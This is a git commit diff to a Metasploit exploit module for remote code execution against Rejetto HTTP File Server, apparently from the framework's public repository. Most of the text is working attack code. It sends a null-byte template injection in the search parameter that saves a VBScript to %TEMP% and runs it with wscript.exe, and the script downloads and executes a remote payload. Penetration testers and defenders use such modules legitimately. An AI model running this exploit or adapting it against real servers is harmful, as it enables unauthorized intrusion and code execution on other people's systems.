Use %TEMP% and update ranking

2014-10-08 12:12:00 -05:00 · 2014-10-08 12:12:00 -05:00 · 98b69e095c
parent d90fe4f724
commit 98b69e095c
1 changed files with 7 additions and 10 deletions
--- a/modules/exploits/windows/http/rejetto_hfs_exec.rb
+++ b/modules/exploits/windows/http/rejetto_hfs_exec.rb
@ -6,7 +6,7 @@
 require 'msf/core'

 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
@ -49,7 +49,6 @@ class Metasploit3 < Msf::Exploit::Remote
      register_options(
        [
          OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
-          OptString.new('SAVE_PATH', [true, 'Target writable path', 'c:\\']),
          OptInt.new('HTTPDELAY',    [false, 'Seconds to wait before terminating web server', 10]),
        ], self.class)
  end
@ -86,6 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
    file_name = rand_text_alpha(rand(10)+5)
    file_ext = '.vbs'
    file_full_name = file_name + file_ext
+    vbs_path = "%TEMP%\\#{file_full_name}"

    vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0a"
    vbs_code << "On Error Resume Next\x0d\x0a"
@ -97,27 +97,24 @@ class Metasploit3 < Msf::Exploit::Remote
    vbs_code << "Execute x.responseText"

    payloads = [
-      "save|#{datastore['SAVE_PATH']}#{file_full_name}|#{vbs_code}",
-      "exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_full_name}"
+      "save|#{vbs_path}|#{vbs_code}",
+      "exec|wscript.exe //B //NOLOGO #{vbs_path}"
    ]

    print_status("Sending a malicious request to #{target_uri.path}")
    payloads.each do |payload|
-      res = send_request_raw({
+      send_request_raw({
        'method' => 'GET',
        'uri'    => "/?search=%00{.#{URI::encode(payload)}.}"
      })
-      if res
-        print_status("#{res.code}\n#{res.body.to_s}")
-      end
    end
-    register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_full_name}")
+    register_file_for_cleanup(vbs_path)
  end

  def exploit
    begin
      Timeout.timeout(datastore['HTTPDELAY']) { super }
-      rescue Timeout::Error
+    rescue Timeout::Error
      # When the server stops due to our timeout, this is raised
    end
  end